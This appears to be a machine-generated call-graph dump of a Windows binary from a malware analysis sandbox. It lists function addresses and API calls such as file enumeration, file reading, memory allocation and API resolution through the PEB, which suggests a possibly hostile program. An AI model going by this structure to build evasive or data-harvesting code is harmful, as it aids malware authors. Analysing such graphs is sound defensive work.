40362f 9225->9248 9226 4031e5 4 API calls 9229 408a88 9226->9229 9251 403649 9228->9251 9229->9225 9230 4031e5 4 API calls 9229->9230 9231 408ac4 9230->9231 9232 405b6f 6 API calls 9231->9232 9233 408aff 9232->9233 9233->9225 9245 408508 9233->9245 9236 4086e2 9235->9236 9237 408744 9235->9237 9236->9237 9238 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9236->9238 9237->9154 9238->9236 9240 4031e5 4 API calls 9239->9240 9241 4036b5 9240->9241 9241->9154 9243 4031e5 4 API calls 9242->9243 9244 403679 9243->9244 9244->9225 9244->9226 9246 4031e5 4 API calls 9245->9246 9247 40851b 9246->9247 9247->9225 9249 4031e5 4 API calls 9248->9249 9250 403642 9249->9250 9250->9228 9252 4031e5 4 API calls 9251->9252 9253 40365c 9252->9253 9253->9222 9854 40f252 9855 404bee 6 API calls 9854->9855 9856 40f269 9855->9856 9857 404bee 6 API calls 9856->9857 9863 40f2ff 9856->9863 9858 40f282 9857->9858 9859 404bee 6 API calls 9858->9859 9860 40f290 9859->9860 9871 404c4e 9860->9871 9862 40f2a7 9862->9863 9864 405872 4 API calls 9862->9864 9865 40f2cd 9864->9865 9866 405872 4 API calls 9865->9866 9867 40f2dc 9866->9867 9868 405872 4 API calls 9867->9868 9869 40f2ee 9868->9869 9870 405762 4 API calls 9869->9870 9870->9863 9872 402b7c 2 API calls 9871->9872 9874 404c60 9872->9874 9873 404ca4 9873->9862 9874->9873 9875 4031e5 4 API calls 9874->9875 9876 404c8d 9875->9876 9876->9873 9877 402bab 2 API calls 9876->9877 9877->9873 9878 41045c 9879 4040bb 12 API calls 9878->9879 9880 410477 9879->9880 9881 41060b 9880->9881 9909 407851 9880->9909 9883 41048f 9885 407851 2 API calls 9883->9885 9889 410604 9883->9889 9884 403f9e 5 API calls 9884->9881 9886 4104a9 9885->9886 9891 4105e0 9886->9891 9892 405ae9 6 API calls 9886->9892 9894 41056f 9886->9894 9895 4105eb 9886->9895 9887 402bab 2 API calls 9887->9889 9888 402bab 2 API calls 9890 4105fb 9888->9890 9889->9884 9890->9887 9893 402bab 2 API calls 9891->9893 9891->9895 9892->9886 9893->9895 9894->9891 9896 4105d6 9894->9896 9898 412269 6 API calls 9894->9898 9895->9888 9895->9890 9897 402bab 2 API calls 9896->9897 9897->9891 9899 410580 9898->9899 9899->9896 9900 405872 4 API calls 9899->9900 9901 410599 9900->9901 9902 405872 4 API calls 9901->9902 9903 4105a9 9902->9903 9904 405872 4 API calls 9903->9904 9905 4105bb 9904->9905 9906 405872 4 API calls 9905->9906 9907 4105cd 9906->9907 9908 402bab 2 API calls 9907->9908 9908->9896 9910 407866 9909->9910 9911 402b7c 2 API calls 9910->9911 9912 407899 9910->9912 9911->9912 9912->9883 9315 40f561 9318 40f4b6 9315->9318 9319 413b28 6 API calls 9318->9319 9324 40f4bf 9319->9324 9320 40f559 9321 405b6f 6 API calls 9321->9324 9322 402bab GetProcessHeap HeapFree 9322->9324 9323 413a58 13 API calls 9323->9324 9324->9320 9324->9321 9324->9322 9324->9323 9328 403b64 9329 4031e5 4 API calls 9328->9329 9330 403b77 PathFileExistsW 9329->9330 9944 40d069 9945 404bee 6 API calls 9944->9945 9946 40d080 9945->9946 9947 404bee 6 API calls 9946->9947 9968 40d1e2 9946->9968 9948 40d099 9947->9948 9949 404bee 6 API calls 9948->9949 9950 40d0a7 9949->9950 9985 404ba7 9950->9985 9953 404bee 6 API calls 9954 40d0c5 9953->9954 9955 404c4e 6 API calls 9954->9955 9956 40d0dc 9955->9956 9957 404bee 6 API calls 9956->9957 9958 40d0eb 9957->9958 9959 404ba7 4 API calls 9958->9959 9960 40d0fa 9959->9960 9961 404bee 6 API calls 9960->9961 9962 40d109 9961->9962 9963 404c4e 6 API calls 9962->9963 9964 40d123 9963->9964 9965 405872 4 API calls 9964->9965 9964->9968 9966 40d14a 9965->9966 9967 405872 4 API calls 9966->9967 9969 40d159 9967->9969 9970 405872 4 API calls 9969->9970 9971 40d16b 9970->9971 9972 405781 4 API calls 9971->9972 9973 40d179 9972->9973 9974 405872 4 API calls 9973->9974 9975 40d18b 9974->9975 9976 405762 4 API calls 9975->9976 9977 40d19f 9976->9977 9978 405872 4 API calls 9977->9978 9979 40d1b1 9978->9979 9980 405781 4 API calls 9979->9980 9981 40d1bf 9980->9981 9982 405872 4 API calls 9981->9982 9983 40d1d1 9982->9983 9984 405762 4 API calls 9983->9984 9984->9968 9986 4031e5 4 API calls 9985->9986 9987 404bca 9986->9987 9987->9953 9357 40f16e 9358 4056bf 2 API calls 9357->9358 9359 40f17b 9358->9359 9360 412093 20 API calls 9359->9360 9361 40f19e 9360->9361 9362 412093 20 API calls 9361->9362 9363 40f1b6 9362->9363 9364 412093 20 API calls 9363->9364 9365 40f1cc 9364->9365 9366 412093 20 API calls 9365->9366 9367 40f1e2 9366->9367 9368 413aca 4 API calls 9367->9368 9369 40f1ef 9368->9369 9370 405695 2 API calls 9369->9370 9371 40f1fa 9370->9371 9372 40ce71 9373 413b28 6 API calls 9372->9373 9374 40ce78 9373->9374 9375 405b6f 6 API calls 9374->9375 9379 40ce83 9375->9379 9376 40cec1 9377 403fbf 7 API calls 9376->9377 9378 40cecc 9377->9378 9382 403d74 19 API calls 9378->9382 9389 40cefb 9378->9389 9379->9376 9380 403d74 19 API calls 9379->9380 9390 40ceba 9379->9390 9383 40cead 9380->9383 9381 402bab 2 API calls 9381->9376 9384 40cee7 9382->9384 9387 402bab 2 API calls 9383->9387 9383->9390 9385 402bab 2 API calls 9384->9385 9388 40cef4 9384->9388 9385->9388 9386 402bab 2 API calls 9386->9389 9387->9390 9388->9386 9390->9381 9391 406472 9392 4031e5 4 API calls 9391->9392 9393 406484 Sleep 9392->9393 10061 40f204 10062 405781 4 API calls 10061->10062 10063 40f214 10062->10063 10064 4057df 13 API calls 10063->10064 10065 40f226 10064->10065 9451 403c08 9452 4031e5 4 API calls 9451->9452 9453 403c1a DeleteFileW 9452->9453 9454 410a09 9455 41219c 14 API calls 9454->9455 9456 410a1b 9455->9456 9457 41219c 14 API calls 9456->9457 9458 410a23 9457->9458 9459 41219c 14 API calls 9458->9459 9460 410a2c 9459->9460 9461 41219c 14 API calls 9460->9461 9462 410a38 9461->9462 9463 404b22 6 API calls 9462->9463 9464 410a4c 9463->9464 9465 410a7a 9464->9465 9466 403fbf 7 API calls 9464->9466 9467 410a5c 9466->9467 9468 410a71 9467->9468 9469 413a58 13 API calls 9467->9469 9470 402bab 2 API calls 9468->9470 9471 410a6b 9469->9471 9470->9465 9472 402bab 2 API calls 9471->9472 9472->9468 10066 410d09 10067 410d17 10066->10067 10081 410d56 10066->10081 10082 406642 10067->10082 10069 413a58 13 API calls 10071 410d6f 10069->10071 10072 4056bf 2 API calls 10073 410d2e 10072->10073 10095 405641 10073->10095 10075 410d41 10076 413aca 4 API calls 10075->10076 10077 410d4a 10076->10077 10078 405695 2 API calls 10077->10078 10079 410d50 10078->10079 10080 4036a3 4 API calls 10079->10080 10080->10081 10081->10069 10083 406662 10082->10083 10084 4031e5 4 API calls 10083->10084 10085 406676 10084->10085 10099 4066bf 10085->10099 10090 4066b1 10092 4036a3 4 API calls 10090->10092 10091 4066a7 10093 4036a3 4 API calls 10091->10093 10094 4066ac 10092->10094 10093->10094 10094->10072 10094->10081 10096 40564d 10095->10096 10097 405673 10095->10097 10096->10097 10098 4056fc 4 API calls 10096->10098 10097->10075 10098->10097 10100 4031e5 4 API calls 10099->10100 10101 4066dc 10100->10101 10102 4066f6 SetLastError 10101->10102 10103 406708 GetLastError 10101->10103 10104 406693 10102->10104 10103->10104 10105 406713 10103->10105 10121 406455 10104->10121 10106 4031e5 4 API calls 10105->10106 10107 406725 10106->10107 10107->10104 10108 4031e5 4 API calls 10107->10108 10109 40673f 10108->10109 10110 406753 10109->10110 10111 406749 10109->10111 10112 4031e5 4 API calls 10110->10112 10113 4036a3 4 API calls 10111->10113 10114 406761 10112->10114 10113->10104 10115 40678a 10114->10115 10116 40677c 10114->10116 10118 4036a3 4 API calls 10115->10118 10117 4036a3 4 API calls 10116->10117 10119 406781 10117->10119 10118->10104 10120 4036a3 4 API calls 10119->10120 10120->10104 10122 4031e5 4 API calls 10121->10122 10123 406468 10122->10123 10123->10090 10123->10091 9473 40c509 9474 412093 20 API calls 9473->9474 9475 40c51e 9474->9475 9482 40910d 9483 404b22 6 API calls 9482->9483 9484 409124 9483->9484 9485 405b6f 6 API calls 9484->9485 9490 40917a 9484->9490 9486 40913e 9485->9486 9487 409173 9486->9487 9489 404b22 6 API calls 9486->9489 9488 402bab 2 API calls 9487->9488 9488->9490 9491 409153 9489->9491 9492 40916a 9491->9492 9493 409408 15 API calls 9491->9493 9494 402bab 2 API calls 9492->9494 9495 409164 9493->9495 9494->9487 9496 402bab 2 API calls 9495->9496 9496->9492 9500 410410 9501 4056bf 2 API calls 9500->9501 9502 41041b 9501->9502 9503 412093 20 API calls 9502->9503 9504 41043c 9503->9504 9505 413aca 4 API calls 9504->9505 9506 410449 9505->9506 9507 405695 2 API calls 9506->9507 9508 410454 9507->9508 9535 40c71a 9536 41219c 14 API calls 9535->9536 9537 40c728 9536->9537 10179 410b1a 10180 404bee 6 API calls 10179->10180 10182 410b31 10180->10182 10181 410c6d 10182->10181 10183 404bee 6 API calls 10182->10183 10184 410b5a 10183->10184 10185 404bee 6 API calls 10184->10185 10186 410b69 10185->10186 10187 404bee 6 API calls 10186->10187 10188 410b78 10187->10188 10189 404ba7 4 API calls 10188->10189 10190 410b86 10189->10190 10191 404ba7 4 API calls 10190->10191 10192 410b95 10191->10192 10192->10181 10193 405872 4 API calls 10192->10193 10194 410bd7 10193->10194 10195 405872 4 API calls 10194->10195 10196 410be8 10195->10196 10197 405872 4 API calls 10196->10197 10198 410bf9 10197->10198 10199 405781 4 API calls 10198->10199 10200 410c07 10199->10200 10201 405781 4 API calls 10200->10201 10205 410c15 10201->10205 10202 410c4e 10203 405762 4 API calls 10202->10203 10204 410c60 10203->10204 10204->10181 10207 403f9e 5 API calls 10204->10207 10205->10202 10212 405e5a 10205->10212 10207->10181 10209 4040bb 12 API calls 10210 410c44 10209->10210 10211 402bab 2 API calls 10210->10211 10211->10202 10213 402b7c 2 API calls 10212->10213 10214 405e72 10213->10214 10215 4031e5 4 API calls 10214->10215 10218 405ea3 10214->10218 10216 405e94 10215->10216 10217 402bab 2 API calls 10216->10217 10216->10218 10217->10218 10218->10202 10218->10209 10219 40f81c 10220 404bee 6 API calls 10219->10220 10221 40f833 10220->10221 10222 404bee 6 API calls 10221->10222 10236 40f94f 10221->10236 10223 40f85c 10222->10223 10224 404bee 6 API calls 10223->10224 10225 40f86b 10224->10225 10226 404bee 6 API calls 10225->10226 10227 40f87a 10226->10227 10228 404bee 6 API calls 10227->10228 10229 40f888 10228->10229 10230 404ba7 4 API calls 10229->10230 10231 40f897 10230->10231 10232 405872 4 API calls 10231->10232 10231->10236 10233 40f8d8 10232->10233 10234 405872 4 API calls 10233->10234 10235 40f8ea 10234->10235 10237 405872 4 API calls 10235->10237 10238 40f8fa 10237->10238 10239 405872 4 API calls 10238->10239 10240 40f90c 10239->10240 10241 405781 4 API calls 10240->10241 10242 40f91d 10241->10242 10243 4040bb 12 API calls 10242->10243 10244 40f92d 10243->10244 10245 405762 4 API calls 10244->10245 10246 40f93f 10245->10246 10246->10236 10247 403f9e 5 API calls 10246->10247 10247->10236 9550 402c1f 9551 4031e5 4 API calls 9550->9551 9552 402c31 LoadLibraryW 9551->9552 10257 407e1f 10258 407e2c 10257->10258 10265 407e61 10257->10265 10260 407e3e 10258->10260 10263 402bab 2 API calls 10258->10263 10266 407e51 10258->10266 10259 407ea6 10261 407eb6 10259->10261 10264 402bab 2 API calls 10259->10264 10262 407ed4 10260->10262 10267 402bab 2 API calls 10260->10267 10261->10266 10268 402bab 2 API calls 10261->10268 10263->10260 10264->10261 10265->10259 10265->10261 10269 405872 4 API calls 10265->10269 10266->10262 10270 402bab 2 API calls 10266->10270 10267->10266 10268->10266 10271 407e86 10269->10271 10270->10262 10272 405872 4 API calls 10271->10272 10273 407e96 10272->10273 10274 405872 4 API calls 10273->10274 10274->10259 9565 405924 9566 4031e5 4 API calls 9565->9566 9567 405937 StrStrW 9566->9567 10283 410927 10284 4044ee 7 API calls 10283->10284 10285 41093d 10284->10285 10286 4056bf 2 API calls 10285->10286 10297 4109a4 10285->10297 10287 410954 10286->10287 10288 4044ee 7 API calls 10287->10288 10290 410990 10287->10290 10291 402bab 2 API calls 10287->10291 10298 41080e 10287->10298 10288->10287 10292 413aca 4 API calls 10290->10292 10291->10287 10293 410998 10292->10293 10294 405695 2 API calls 10293->10294 10295 41099e 10294->10295 10296 402bab 2 API calls 10295->10296 10296->10297 10299 410821 10298->10299 10309 41091f 10299->10309 10310 410701 10299->10310 10302 405872 4 API calls 10303 410900 10302->10303 10304 405872 4 API calls 10303->10304 10305 41090d 10304->10305 10306 405872 4 API calls 10305->10306 10307 410919 10306->10307 10308 402bab 2 API calls 10307->10308 10308->10309 10309->10287 10311 405f08 4 API calls 10310->10311 10313 410713 10311->10313 10312 410804 10312->10302 10312->10309 10313->10312 10314 402b7c 2 API calls 10313->10314 10318 410748 10314->10318 10315 4107fd 10316 402bab 2 API calls 10315->10316 10316->10312 10317 402b7c 2 API calls 10320 4107ad 10317->10320 10318->10315 10318->10317 10319 402bab 2 API calls 10319->10315 10320->10319 10321 40d726 10322 404bee 6 API calls 10321->10322 10323 40d73f 10322->10323 10324 40db63 10323->10324 10325 405872 4 API calls 10323->10325 10328 40d761 10325->10328 10326 404bee 6 API calls 10326->10328 10327 405872 4 API calls 10327->10328 10328->10326 10328->10327 10330 40d971 10328->10330 10329 404ba7 4 API calls 10329->10330 10330->10329 10331 405781 4 API calls 10330->10331 10336 40d9bb 10330->10336 10331->10330 10332 404c4e 6 API calls 10332->10336 10333 405781 4 API calls 10333->10336 10334 4037be 4 API calls 10334->10336 10335 405872 4 API calls 10335->10336 10336->10324 10336->10332 10336->10333 10336->10334 10336->10335 9623 40f12f 9624 41219c 14 API calls 9623->9624 9625 40f13f 9624->9625 9626 41219c 14 API calls 9625->9626 9627 40f14c 9626->9627 9628 41219c 14 API calls 9627->9628 9629 40f159 9628->9629 9630 41219c 14 API calls 9629->9630 9631 40f166 9630->9631 9638 40ed35 9639 4056bf 2 API calls 9638->9639 9640 40ed42 9639->9640 9641 412093 20 API calls 9640->9641 9642 40ed63 9641->9642 9643 412093 20 API calls 9642->9643 9644 40ed73 9643->9644 9645 413aca 4 API calls 9644->9645 9646 40ed80 9645->9646 9647 405695 2 API calls 9646->9647 9648 40ed8e 9647->9648 8092 40f3c5 8097 41219c 8092->8097 8095 41219c 14 API calls 8096 40f3e1 8095->8096 8098 4121b1 8097->8098 8113 40f3d3 8097->8113 8099 4121be 8098->8099 8103 4121c5 8098->8103 8145 413ba4 8099->8145 8101 4121ca 8115 404056 8101->8115 8103->8101 8107 412210 8103->8107 8104 4121c3 8104->8113 8122 405b6f 8104->8122 8107->8113 8150 403fbf 8107->8150 8111 402bab 2 API calls 8111->8113 8113->8095 8114 41224d 8114->8111 8114->8113 8161 402b7c GetProcessHeap RtlAllocateHeap 8115->8161 8117 404066 8121 404095 8117->8121 8163 4031e5 8117->8163 8120 402bab 2 API calls 8120->8121 8121->8104 8123 405b7d 8122->8123 8124 402b7c 2 API calls 8123->8124 8125 405b99 8124->8125 8131 405c02 8125->8131 8199 4059b8 8125->8199 8127 405c09 8129 402bab 2 API calls 8127->8129 8128 405bba 8128->8127 8130 402b7c 2 API calls 8128->8130 8129->8131 8132 405bdd 8130->8132 8131->8114 8135 413a58 8131->8135 8132->8127 8133 405be4 8132->8133 8134 402bab 2 API calls 8133->8134 8134->8131 8136 412245 8135->8136 8137 413a63 8135->8137 8158 402bab 8136->8158 8137->8136 8202 405781 8137->8202 8140 405781 4 API calls 8141 413aa0 8140->8141 8205 4057df 8141->8205 8144 405781 4 API calls 8144->8136 8146 413bad 8145->8146 8147 404056 6 API calls 8146->8147 8149 413bb8 8146->8149 8148 413bc5 8147->8148 8148->8104 8149->8104 8151 402b7c 2 API calls 8150->8151 8153 403fcf 8151->8153 8152 403ff4 8152->8104 8153->8152 8324 403b98 8153->8324 8156 403ff8 GetLastError 8157 402bab 2 API calls 8156->8157 8157->8152 8159 402bb4 GetProcessHeap HeapFree 8158->8159 8160 402bc6 8158->8160 8159->8160 8160->8114 8162 402b98 8161->8162 8162->8117 8164 4031f3 8163->8164 8165 403236 8163->8165 8164->8165 8167 403208 8164->8167 8174 4030a5 8165->8174 8180 403263 8167->8180 8169 403258 8169->8120 8169->8121 8170 40320d 8170->8169 8172 4030a5 4 API calls 8170->8172 8171 4031e5 4 API calls 8171->8169 8173 403224 8172->8173 8173->8169 8173->8171 8186 402ca4 8174->8186 8176 4030b0 8177 4030b5 8176->8177 8190 4030c4 8176->8190 8177->8173 8181 40326d 8180->8181 8182 402b7c 2 API calls 8181->8182 8185 4032b7 8181->8185 8183 40328c 8182->8183 8184 402b7c 2 API calls 8183->8184 8184->8185 8185->8170 8187 403079 8186->8187 8189 40307c 8187->8189 8194 40317b GetPEB 8187->8194 8189->8176 8192 4030eb 8190->8192 8193 4030c0 8192->8193 8196 402c03 8192->8196 8193->8173 8195 40319b 8194->8195 8195->8189 8197 4031e5 3 API calls 8196->8197 8198 402c15 GetProcAddress 8197->8198 8198->8193 8200 4031e5 4 API calls 8199->8200 8201 4059cb 8200->8201 8201->8128 8220 405797 8202->8220 8204 405792 8204->8140 8206 4057eb 8205->8206 8219 405832 8205->8219 8206->8219 8230 4040bb 8206->8230 8209 405839 8211 405853 8209->8211 8257 405627 8209->8257 8210 40582c 8254 403f9e 8210->8254 8268 405762 8211->8268 8218 403f9e 5 API calls 8218->8219 8219->8136 8219->8144 8221 4057a1 8220->8221 8222 4057bd 8220->8222 8221->8222 8224 4056fc 8221->8224 8222->8204 8225 405714 8224->8225 8226 402b7c 2 API calls 8225->8226 8227 405730 8226->8227 8228 402bab 2 API calls 8227->8228 8229 405752 8227->8229 8228->8229 8229->8222 8231 4031e5 4 API calls 8230->8231 8232 4040d5 CreateFileW 8231->8232 8233 4040f8 8232->8233 8234 40418d 8232->8234 8235 4031e5 4 API calls 8233->8235 8236 404183 8234->8236 8274 403c90 8234->8274 8242 404105 8235->8242 8236->8209 8236->8210 8236->8219 8240 40416d 8271 403c40 8240->8271 8242->8240 8246 4031e5 4 API calls 8242->8246 8244 4040bb 9 API calls 8250 4041c8 8244->8250 8245 402bab 2 API calls 8245->8236 8247 404131 VirtualAlloc 8246->8247 8247->8240 8248 404142 8247->8248 8249 4031e5 4 API calls 8248->8249 8251 40414f ReadFile 8249->8251 8250->8245 8251->8240 8252 404160 8251->8252 8253 4031e5 4 API calls 8252->8253 8253->8240 8255 4031e5 4 API calls 8254->8255 8256 403fb1 VirtualFree 8255->8256 8256->8219 8258 4031e5 4 API calls 8257->8258 8259 40563a 8258->8259 8260 405872 8259->8260 8262 405881 8260->8262 8261 4058bc 8263 405797 4 API calls 8261->8263 8265 4058af 8261->8265 8262->8261 8321 4058d4 8262->8321 8263->8265 8265->8211 8267 405781 4 API calls 8267->8261 8269 405781 4 API calls 8268->8269 8270 405770 8269->8270 8270->8218 8272 4031e5 4 API calls 8271->8272 8273 403c52 FindCloseChangeNotification 8272->8273 8273->8236 8275 403ca3 8274->8275 8276 403caa 8274->8276 8301 405dc5 8275->8301 8278 404056 6 API calls 8276->8278 8281 403d3a 8276->8281 8279 403cbe 8278->8279 8280 403d2e 8279->8280 8282 403d17 8279->8282 8283 403ccf 8279->8283 8280->8281 8286 402bab 2 API calls 8280->8286 8281->8236 8297 403c59 8281->8297 8284 405b6f 6 API calls 8282->8284 8285 405b6f 6 API calls 8283->8285 8287 403d14 8284->8287 8288 403cdd 8285->8288 8286->8281 8290 402bab 2 API calls 8287->8290 8289 405b6f 6 API calls 8288->8289 8291 403cee 8289->8291 8290->8280 8291->8287 8306 403d4d 8291->8306 8294 403d0b 8296 402bab 2 API calls 8294->8296 8296->8287 8298 403c21 8297->8298 8299 4031e5 4 API calls 8298->8299 8300 403c33 8299->8300 8300->8244 8300->8250 8315 406799 8301->8315 8303 405dd5 8304 402b7c 2 API calls 8303->8304 8305 405dfe 8304->8305 8305->8276 8318 403bb7 8306->8318 8308 403cfe 8308->8294 8309 403c62 8308->8309 8310 403d4d 5 API calls 8309->8310 8311 403c6d 8310->8311 8312 403c72 8311->8312 8313 4031e5 4 API calls 8311->8313 8312->8294 8314 403c87 CreateDirectoryW 8313->8314 8314->8294 8316 4031e5 4 API calls 8315->8316 8317 4067ad 8316->8317 8317->8303 8319 4031e5 4 API calls 8318->8319 8320 403bc9 GetFileAttributesW 8319->8320 8320->8308 8322 405797 4 API calls 8321->8322 8323 4058a8 8322->8323 8323->8265 8323->8267 8325 4031e5 4 API calls 8324->8325 8326 403baa 8325->8326 8326->8152 8326->8156 9763 40ebc6 9764 4040bb 12 API calls 9763->9764 9765 40ebdf 9764->9765 9766 40ecd7 9765->9766 9783 407795 9765->9783 9769 40eccd 9770 403f9e 5 API calls 9769->9770 9770->9766 9771 4056bf 2 API calls 9781 40ec12 9771->9781 9772 40ecb5 9773 402bab 2 API calls 9772->9773 9774 40ecbd 9773->9774 9775 413aca 4 API calls 9774->9775 9776 40ecc7 9775->9776 9777 405695 2 API calls 9776->9777 9777->9769 9778 407908 GetProcessHeap RtlAllocateHeap 9778->9781 9780 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9780->9781 9781->9772 9781->9778 9781->9780 9782 402bab GetProcessHeap HeapFree 9781->9782 9794 412269 9781->9794 9782->9781 9785 4077ab 9783->9785 9784 4077b3 9784->9769 9784->9771 9785->9784 9801 405ae9 9785->9801 9787 4077e1 9787->9784 9788 407802 9787->9788 9789 4077f8 9787->9789 9791 402b7c 2 API calls 9788->9791 9790 402bab 2 API calls 9789->9790 9790->9784 9793 407811 9791->9793 9792 402bab 2 API calls 9792->9784 9793->9792 9817 40374e 9794->9817 9797 412299 9797->9781 9800 402bab 2 API calls 9800->9797 9802 405af7 9801->9802 9803 402b7c 2 API calls 9802->9803 9805 405b03 9803->9805 9804 405b5a 9804->9787 9805->9804 9814 405998 9805->9814 9807 405b21 9808 405b61 9807->9808 9810 402b7c 2 API calls 9807->9810 9809 402bab 2 API calls 9808->9809 9809->9804 9811 405b39 9810->9811 9811->9808 9812 405b40 9811->9812 9813 402bab 2 API calls 9812->9813 9813->9804 9815 4031e5 4 API calls 9814->9815 9816 4059ab 9815->9816 9816->9807 9818 402b7c 2 API calls 9817->9818 9820 40375f 9818->9820 9819 4037a3 9819->9797 9824 4037be 9819->9824 9820->9819 9821 4031e5 4 API calls 9820->9821 9822 40378f 9821->9822 9822->9819 9823 402bab 2 API calls 9822->9823 9823->9819 9825 4031e5 4 API calls 9824->9825 9826 4037e2 9825->9826 9827 40382b 9826->9827 9828 402b7c 2 API calls 9826->9828 9827->9800 9829 403802 9828->9829 9830 403832 9829->9830 9832 403809 9829->9832 9831 4036a3 4 API calls 9830->9831 9831->9827 9833 4036a3 4 API calls 9832->9833 9833->9827 8924 410cd1 8929 412093 8924->8929 8927 412093 20 API calls 8928 410cff 8927->8928 8931 4120a5 8929->8931 8950 410cf1 8929->8950 8930 4120b3 8932 404056 6 API calls 8930->8932 8931->8930 8935 412100 8931->8935 8933 4120ba 8932->8933 8934 405b6f 6 API calls 8933->8934 8937 412152 8933->8937 8933->8950 8940 412125 8934->8940 8936 403fbf 7 API calls 8935->8936 8935->8950 8936->8933 8951 403d74 8937->8951 8940->8937 8942 412139 8940->8942 8943 41214d 8940->8943 8941 41218c 8945 402bab 2 API calls 8941->8945 8941->8950 8947 402bab 2 API calls 8942->8947 8946 402bab 2 API calls 8943->8946 8944 402bab 2 API calls 8944->8941 8945->8950 8946->8937 8948 41213e 8947->8948 8949 402bab 2 API calls 8948->8949 8949->8950 8950->8927 8952 403d87 8951->8952 8953 403ea3 8952->8953 8954 405b6f 6 API calls 8952->8954 8955 405b6f 6 API calls 8953->8955 8956 403da3 8954->8956 8957 403eb9 8955->8957 8956->8953 8958 4031e5 4 API calls 8956->8958 8959 4031e5 4 API calls 8957->8959 8965 403f6f 8957->8965 8960 403dbc FindFirstFileW 8958->8960 8961 403ed3 FindFirstFileW 8959->8961 8973 403e9c 8960->8973 8976 403dd1 8960->8976 8980 403f8d 8961->8980 8982 403ee8 8961->8982 8962 402bab 2 API calls 8962->8953 8963 402bab 2 API calls 8963->8965 8964 4031e5 4 API calls 8966 403e84 FindNextFileW 8964->8966 8965->8941 8965->8944 8967 403e96 8966->8967 8966->8976 8991 403bef 8967->8991 8968 405b6f 6 API calls 8968->8982 8969 4031e5 4 API calls 8972 403f50 FindNextFileW 8969->8972 8971 405b6f 6 API calls 8971->8976 8974 403f87 8972->8974 8972->8982 8973->8962 8977 403bef 5 API calls 8974->8977 8975 403f75 8978 402bab 2 API calls 8975->8978 8976->8964 8976->8971 8979 403d74 15 API calls 8976->8979 8985 402bab 2 API calls 8976->8985 8986 403f63 8976->8986 8977->8980 8981 403f7b 8978->8981 8979->8976 8980->8963 8983 403bef 5 API calls 8981->8983 8982->8968 8982->8969 8982->8975 8984 402bab 2 API calls 8982->8984 8994 40fa23 8982->8994 8983->8965 8984->8982 8985->8976 8987 402bab 2 API calls 8986->8987 8988 403f69 8987->8988 8989 403bef 5 API calls 8988->8989 8989->8965 8992 4031e5 4 API calls 8991->8992 8993 403c01 FindClose 8992->8993 8993->8973 8995 40fa39 8994->8995 8996 410293 8995->8996 8997 405b6f 6 API calls 8995->8997 8996->8982 8998 40ffcc 8997->8998 8998->8996 8999 4040bb 12 API calls 8998->8999 9000 40ffeb 8999->9000 9001 41028c 9000->9001 9003 402b7c 2 API calls 9000->9003 9049 41027d 9000->9049 9002 402bab 2 API calls 9001->9002 9002->8996 9005 41001e 9003->9005 9004 403f9e 5 API calls 9004->9001 9006 40a423 4 API calls 9005->9006 9005->9049 9007 41004a 9006->9007 9008 4031e5 4 API calls 9007->9008 9009 41005c 9008->9009 9010 4031e5 4 API calls 9009->9010 9011 410079 9010->9011 9012 4031e5 4 API calls 9011->9012 9013 410096 9012->9013 9014 4031e5 4 API calls 9013->9014 9015 4100b0 9014->9015 9016 4031e5 4 API calls 9015->9016 9017 4100cd 9016->9017 9018 4031e5 4 API calls 9017->9018 9019 4100ea 9018->9019 9050 412516 9019->9050 9021 4100fd 9022 40642c 5 API calls 9021->9022 9023 41013e 9022->9023 9024 410142 9023->9024 9025 41019f 9023->9025 9026 40488c 5 API calls 9024->9026 9028 4031e5 4 API calls 9025->9028 9027 410151 9026->9027 9029 404866 4 API calls 9027->9029 9046 41019c 9027->9046 9038 4101bb 9028->9038 9031 410163 9029->9031 9030 40642c 5 API calls 9033 410201 9030->9033 9039 406c4c 6 API calls 9031->9039 9047 41018e 9031->9047 9032 41022a 9034 413a58 13 API calls 9032->9034 9036 410205 9033->9036 9037 41022f 9033->9037 9041 41026e 9034->9041 9035 403c40 5 API calls 9035->9046 9042 4126a7 7 API calls 9036->9042 9053 4125db 9037->9053 9045 4031e5 4 API calls 9038->9045 9040 410178 9039->9040 9044 406c4c 6 API calls 9040->9044 9048 402bab 2 API calls 9041->9048 9042->9032 9044->9047 9045->9046 9046->9030 9046->9032 9047->9035 9048->9049 9049->9004 9051 4031e5 4 API calls 9050->9051 9052 412539 9051->9052 9052->9021 9054 40488c 5 API calls 9053->9054 9055 4125ec 9054->9055 9056 41269f 9055->9056 9057 4031e5 4 API calls 9055->9057 9056->9032 9058 412609 9057->9058 9059 41268f 9058->9059 9061 4031e5 4 API calls 9058->9061 9060 403c40 5 API calls 9059->9060 9060->9056 9062 41262a 9061->9062 9063 412675 9062->9063 9070 4124f1 9062->9070 9065 4031e5 4 API calls 9063->9065 9065->9059 9067 412663 9069 4031e5 4 API calls 9067->9069 9068 4124f1 4 API calls 9068->9067 9069->9063 9071 4031e5 4 API calls 9070->9071 9072 412503 9071->9072 9072->9067 9072->9068 9259 4049dc 9260 4031e5 4 API calls 9259->9260 9261 4049ef 9260->9261 9916 40cddd 9917 405b6f 6 API calls 9916->9917 9918 40cdee 9917->9918 9919 40ce06 9918->9919 9921 413a58 13 API calls 9918->9921 9920 40ce59 9919->9920 9922 405b6f 6 API calls 9919->9922 9923 40ce00 9921->9923 9925 40ce1c 9922->9925 9924 402bab 2 API calls 9923->9924 9924->9919 9925->9920 9926 40ce52 9925->9926 9927 403d74 19 API calls 9925->9927 9928 402bab 2 API calls 9926->9928 9929 40ce45 9927->9929 9928->9920 9929->9926 9930 402bab 2 API calls 9929->9930 9930->9926 9262 40ecde 9263 412093 20 API calls 9262->9263 9264 40ecfd 9263->9264 9265 412093 20 API calls 9264->9265 9266 40ed0d 9265->9266 9270 40e8df 9271 412093 20 API calls 9270->9271 9272 40e8f8 9271->9272 9273 412093 20 API calls 9272->9273 9274 40e908 9273->9274 9281 404b22 9274->9281 9276 40e91c 9277 40e936 9276->9277 9280 40e93d 9276->9280 9288 40e944 9276->9288 9279 402bab 2 API calls 9277->9279 9279->9280 9282 402b7c 2 API calls 9281->9282 9283 404b33 9282->9283 9284 404b66 9283->9284 9297 4049b3 9283->9297 9284->9276 9287 402bab 2 API calls 9287->9284 9289 4056bf 2 API calls 9288->9289 9290 40e952 9289->9290 9291 4057df 13 API calls 9290->9291 9296 40e976 9290->9296 9292 40e966 9291->9292 9293 413aca 4 API calls 9292->9293 9294 40e970 9293->9294 9295 405695 2 API calls 9294->9295 9295->9296 9296->9277 9298 4031e5 4 API calls 9297->9298 9299 4049c6 9298->9299 9299->9284 